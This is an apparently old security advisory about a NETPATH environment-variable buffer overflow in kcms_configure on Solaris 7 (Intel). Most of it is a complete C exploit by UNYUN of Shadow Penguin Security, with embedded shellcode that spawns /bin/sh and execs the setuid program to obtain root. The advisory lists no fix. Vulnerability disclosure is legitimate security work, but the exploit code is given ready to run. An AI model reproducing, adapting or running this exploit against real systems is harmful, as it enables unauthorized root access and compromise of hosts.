COMMAND

    kcms_configure

SYSTEMS AFFECTED

    Solaris7

PROBLEM

    UNYUN found  following.   kcms_configure has  a overflow  bug with
    "-P"  option  and  it  has  been  reported(107339-01).   But, this
    program has another hole.  kcms_configure overflows if long string
    is specified  in NETPATH  environment, it  is exploitable.   UNYUN
    coded  an  exploit  for  Solaris7  intel  edition to obtain a root
    privilege.

    /*=============================================================================
       kcms_configure Exploit for Solaris7 Intel Edition
       The Shadow Penguin Security (http://shadowpenguin.backsection.net)
       Written by UNYUN (shadowpenguin@backsection.net)
      =============================================================================
    */
    
    #define ENV     "NETPATH="
    #define MAXBUF  3000
    #define RETADR  2088
    #define RETOFS  0xad0
    #define FAKEADR 2076
    #define NOP 0x90
    
    unsigned long get_sp(void)
    {
      __asm__(" movl %esp,%eax ");
    }
    
    char exploit_code[] =
    "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
    "\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
    "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
    "\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
    "\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33"
    "\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88"
    "\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f"
    "\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46"
    "\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01"
    "\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh";
    
    main()
    {
        char            buf[MAXBUF];
        unsigned int    i,ip,sp;
    
        putenv("LANG=");
        sp=get_sp();
        printf("ESP=0x%x\n",sp);
    
        memset(buf,NOP,MAXBUF);
    
        ip=sp;
        buf[FAKEADR  ]=ip&0xff;
        buf[FAKEADR+1]=(ip>>8)&0xff;
        buf[FAKEADR+2]=(ip>>16)&0xff;
        buf[FAKEADR+3]=(ip>>24)&0xff;
    
        ip=sp-RETOFS;
        buf[RETADR  ]=ip&0xff;
        buf[RETADR+1]=(ip>>8)&0xff;
        buf[RETADR+2]=(ip>>16)&0xff;
        buf[RETADR+3]=(ip>>24)&0xff;
    
        strncpy(buf+2500,exploit_code,strlen(exploit_code));
    
        strncpy(buf,ENV,strlen(ENV));
        buf[MAXBUF-1]=0;
        putenv(buf);
    
        execl("/usr/openwin/bin/kcms_configure","kcms_configure","1",0);
    }

SOLUTION

    Nothing yet.